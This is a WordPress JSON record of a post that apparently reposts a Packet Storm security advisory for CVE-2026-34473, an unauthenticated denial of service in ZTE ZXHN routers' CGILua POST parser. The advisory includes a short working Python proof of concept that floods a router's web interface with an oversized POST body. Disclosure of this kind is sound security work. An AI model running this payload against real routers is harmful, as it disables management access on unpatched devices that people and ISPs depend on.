{"id":56963,"date":"2026-05-26T11:36:18","date_gmt":"2026-05-26T11:36:18","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=56963"},"modified":"2026-05-26T11:36:18","modified_gmt":"2026-05-26T11:36:18","slug":"zte-zxhn-router-denial-of-service","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=56963","title":{"rendered":"\ud83d\udcc4 ZTE ZXHN Router Denial of Service_PACKETSTORM:221995"},"content":{"rendered":"

{“lastseen”:”2026-05-26T16:00:21″,”description”:”The CGILua post.lua parser used in ZTE ZXHN routers does not enforce an upper bound on the body size of application\/x-www-form-urlencoded POST requests. An unauthenticated attacker can crash or freeze the router’s web management service by sending a…”,”published”:”2026-05-26T00:00:00″,”modified”:”2026-05-26T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 ZTE ZXHN Router Denial of Service”,”source”:””,”references”:””,”id”:”PACKETSTORM:221995″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-34473″],”sourceData”:”—–BEGIN SECURITY ADVISORY—–\\n \\n Advisory ID: MONX-2026-001\\n CVE ID: CVE-2026-34473\\n Title: Unauthenticated Denial of Service via Oversized POST Body\\n in ZTE Router CGILua Parser\\n Affected: 17+ ZTE ZXHN router models (~140,000 publicly exposed\\n devices)\\n CVSS Score: 7.5 (AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:N\/I:N\/A:H)\\n Date: 2026-05-20\\n Author: Mina Nageh Salalma (Monx Research)\\n Contact: minanageh379@gmail.com\\n Public URL:\\n https:\/\/github.com\/minanagehsalalma\/cve-2026-34473-unauthenticated-dos-zte-routers\\n MITRE: https:\/\/www.cve.org\/CVERecord?id=CVE-2026-34473\\n \\n \\n AFFECTED PRODUCTS\\n —————–\\n 17+ ZTE ZXHN router models sharing the CGILua firmware stack.\\n Estimated 140,000+ devices publicly reachable on the Internet at time of\\n research.\\n \\n \\n VULNERABILITY DESCRIPTION\\n ————————–\\n The CGILua post.lua parser used in ZTE ZXHN routers does not enforce an\\n upper\\n bound on the body size of application\/x-www-form-urlencoded POST requests.\\n An unauthenticated attacker can crash or freeze the router’s web management\\n service by sending a single HTTP POST request with an oversized body to any\\n CGI endpoint. No authentication, session cookie, or prior access is\\n required.\\n \\n \\n ROOT CAUSE\\n ———-\\n Firmware analysis of extracted squashfs images confirms that post.lua reads\\n the entire POST body into memory before parsing. There is no Content-Length\\n check or body-size limiter before the allocation occurs. Oversized payloads\\n cause the LuCI\/CGILua process to exhaust memory or fault, taking down the\\n web management interface until the device is power-cycled.\\n \\n \\n PROOF OF CONCEPT\\n —————-\\n import requests\\n url = \\”http:\/\/TARGET_IP\/cgi-bin\/luci\\”\\n payload = \\”a=\\” + \\”A\\” * (256 * 1024) # 256 KB\\n headers = {\\”Content-Type\\”: \\”application\/x-www-form-urlencoded\\”}\\n try:\\n r = requests.post(url, data=payload, headers=headers, timeout=15)\\n print(f\\”HTTP {r.status_code}\\”)\\n except requests.exceptions.Timeout:\\n print(\\”Timeout – DoS successful\\”)\\n except requests.exceptions.ConnectionError:\\n print(\\”Connection dropped – DoS successful\\”)\\n \\n \\n IMPACT\\n ——\\n An unauthenticated attacker on the LAN or WAN (if management interface is\\n publicly exposed, as is the case for ~140,000 devices) can permanently\\n disable remote management access, forcing a physical reboot to restore\\n access.\\n ISP-deployed devices with no physical access for end users are especially\\n vulnerable.\\n \\n \\n TIMELINE\\n ——–\\n 2024-05: Local validation on hardware. Firmware extraction and root-cause\\n confirmed.\\n 2024-05: Report sent to ZTE PSIRT.\\n 2025-01: Escalated to MITRE after ZTE failed to respond.\\n 2026-03: MITRE assigned CVE-2026-34473.\\n 2026-05-20: Full public disclosure.\\n \\n \\n VENDOR RESPONSE\\n —————\\n ZTE PSIRT did not respond to the initial report. MITRE assigned the CVE\\n directly. No patch has been issued.\\n \\n \\n CREDITS\\n ——-\\n Mina Nageh Salalma (Monx Research)\\n https:\/\/github.com\/minanagehsalalma\\n \\n —–END SECURITY ADVISORY—–“,”sourceHref”:”https:\/\/packetstorm.news\/download\/221995″,”cvss”:{“score”:7.5,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:N\/I:N\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/221995\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-05-26T16:00:21″,”description”:”The CGILua post.lua parser used in ZTE ZXHN routers does not enforce an upper bound on the body size of application\/x-www-form-urlencoded POST requests. An unauthenticated…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,16,12,15,13,53,7,11,5],"class_list":["post-56963","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-75","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 ZTE ZXHN Router Denial of Service_PACKETSTORM:221995 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=56963\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 ZTE ZXHN Router Denial of Service_PACKETSTORM:221995 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-05-26T16:00:21″,”description”:”The CGILua post.lua parser used in ZTE ZXHN routers does not enforce an upper bound on the body size of application\/x-www-form-urlencoded POST requests. An unauthenticated...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=56963\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-26T11:36:18+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56963#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56963\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 ZTE ZXHN Router Denial of Service_PACKETSTORM:221995\",\"datePublished\":\"2026-05-26T11:36:18+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56963\"},\"wordCount\":655,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.5\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=56963#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56963\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56963\",\"name\":\"\ud83d\udcc4 ZTE ZXHN Router Denial of Service_PACKETSTORM:221995 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-05-26T11:36:18+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56963#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=56963\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56963#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 ZTE ZXHN Router Denial of Service_PACKETSTORM:221995\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 ZTE ZXHN Router Denial of Service_PACKETSTORM:221995 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=56963","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 ZTE ZXHN Router Denial of Service_PACKETSTORM:221995 - zero redgem","og_description":"{“lastseen”:”2026-05-26T16:00:21″,”description”:”The CGILua post.lua parser used in ZTE ZXHN routers does not enforce an upper bound on the body size of application\/x-www-form-urlencoded POST requests. An unauthenticated...","og_url":"https:\/\/zero.redgem.net\/?p=56963","og_site_name":"zero redgem","article_published_time":"2026-05-26T11:36:18+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=56963#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=56963"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 ZTE ZXHN Router Denial of Service_PACKETSTORM:221995","datePublished":"2026-05-26T11:36:18+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=56963"},"wordCount":655,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.5","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=56963#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=56963","url":"https:\/\/zero.redgem.net\/?p=56963","name":"\ud83d\udcc4 ZTE ZXHN Router Denial of Service_PACKETSTORM:221995 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-05-26T11:36:18+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=56963#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=56963"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=56963#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 ZTE ZXHN Router Denial of Service_PACKETSTORM:221995"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/56963","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=56963"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/56963\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=56963"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=56963"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=56963"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}